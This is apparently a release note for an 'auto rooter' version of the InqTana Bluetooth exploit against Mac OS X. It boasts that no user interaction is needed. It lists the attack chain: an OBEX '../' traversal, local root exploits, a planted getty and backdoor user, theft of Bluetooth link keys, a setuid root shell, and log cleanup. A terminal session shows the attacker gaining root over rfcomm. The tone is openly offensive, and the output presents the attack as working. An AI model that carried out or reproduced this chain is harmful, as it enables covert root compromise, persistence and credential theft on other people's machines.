This is an improved version of the InqTana code. Rather than a Mac based worm it is now a linux based auto rooter. What exactly does 
it do you ask? 

1. Exploit ../ bug in obex (silently! no user interaction get it? N-O U-S-E-R I-N-T-E-R-A-C-T-I-O-N for you tards out there)
2. Make use of a local exploit to take root. In this case either excploit.c kernel mach port abuse, CF_CHARSET or launchd exploits. 
3. Install a getty on the PDA-Sync port by dropping /etc/ttys file.
4. Add a local user so the attacker can use his bluetooth tty prompt to get a local shell. 
5. Harvest link keys from blued.plist file. *grin* 
6. Create a setuid root shell in ~/bluetooth for the local user . 
7. Clean up
8. reboot if its a 10.3.9 box. 

This is the end result (aka pwnage): 

kfinisterre@threat:~$ rfcomm connect 0 00:14:51:5A:3D:99 3
Connected /dev/rfcomm0 to 00:14:51:5A:3D:99 on channel 3
Press CTRL-C for hangup

kfinisterre@threat:~$ minicom

Welcome to minicom 2.1

OPTIONS: History Buffer, F-key Macros, Search History Buffer, I18n
Compiled on Nov  5 2005, 15:45:44.

Press CTRL-A Z for help on special keys

k-fs-Computer.local!login: pwned mghee
Password:
Last login: Tue Aug 15 00:45:09 on tty.Blue
Welcome to Darwin!
k-fs-Computer:~ bluetooth$ ls -al
total 48
drwxr-xr-x  4 bluetoot  666      136 15 Aug 00:45 .
drwxrwxr-t  8 root      admin    272 15 Aug 00:26 ..
-rw-------  1 bluetoot  666        5 15 Aug 00:45 .bash_history
-rwsr-xr-x  1 root      666    17000 15 Aug 00:42 shX
k-fs-Computer:~ bluetooth$ ./shX
csh: No entry for terminal type "unknown"
csh: using dumb terminal settings.
[k-fs-Computer:~] bluetoot# id
uid=0(root) gid=0(wheel) groups=0(wheel)

If you need to see more hopefully you catch Thierry Zollers hack.lu talk. 
This code will also be demonstrated in detail in the new book Hacking Exposed Wireless
http://books.mcgraw-hill.com/getbook.php?isbn=0072262583